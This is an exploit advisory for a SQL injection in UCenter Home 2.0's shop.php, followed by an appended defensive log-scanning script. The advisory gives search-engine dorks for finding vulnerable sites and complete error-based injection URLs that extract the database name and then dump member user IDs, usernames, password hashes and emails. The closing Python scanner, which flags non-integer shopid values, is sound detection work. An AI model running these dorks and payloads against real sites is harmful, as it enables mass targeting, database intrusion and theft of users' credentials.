__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Parameters : (?)ac=view&shopid=
Vulnerability Type : SQL Injection (MySQL Error Based)
Required Materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim's database name.

For injection : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
..
DB : Okay.
Edit the DB : `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
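
A defender-side check for the request pattern this advisory describes, as an added example that is not part of the original advisory: it scans web access logs for shop.php?ac=view requests whose shopid is not a plain integer and reports which of the advisory's SQL keywords appear in the value. The log format, the sample lines and the assumption that legitimate shopid values are decimal integers are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Keywords taken from the request strings shown in the advisory above.
MARKERS = ("information_schema", "floor(rand(", "concat(", "group by", "uc_members")
REQ = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/2024:10:00:01 +0000] "GET /shop.php?ac=view&shopid=253 HTTP/1.1" 200 5120
198.51.100.9 - - [01/Jan/2024:10:00:05 +0000] "GET /shop.php?ac=view&shopid=253%20and(select%201%20from%20information_schema.tables%20group%20by%20x) HTTP/1.1" 200 812
198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET /space.php?uid=12 HTTP/1.1" 200 4096
198.51.100.3 - - [01/Jan/2024:10:00:12 +0000] "GET /shop.php?ac=view&shopid=12abc HTTP/1.1" 200 640
"""

def scan(log_text):
    """Return (client_ip, shopid, matched_markers) for each suspicious shop.php request."""
    findings = []
    for line in log_text.splitlines():
        m = REQ.match(line)
        if not m:
            continue
        ip, target = m.groups()
        url = urlsplit(target)
        if not url.path.lower().endswith("/shop.php"):
            continue
        params = parse_qs(url.query, keep_blank_values=True)  # also URL-decodes values
        if params.get("ac") != ["view"]:
            continue
        for value in params.get("shopid", []):
            # Assumption: a legitimate shop id is a plain decimal integer.
            if re.fullmatch(r"[0-9]+", value):
                continue
            hits = [k for k in MARKERS if k in value.lower()]
            findings.append((ip, value, hits))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The non-integer test is the primary signal; the keyword list only ranks findings, since an attacker can vary the SQL but cannot make it look like a bare integer.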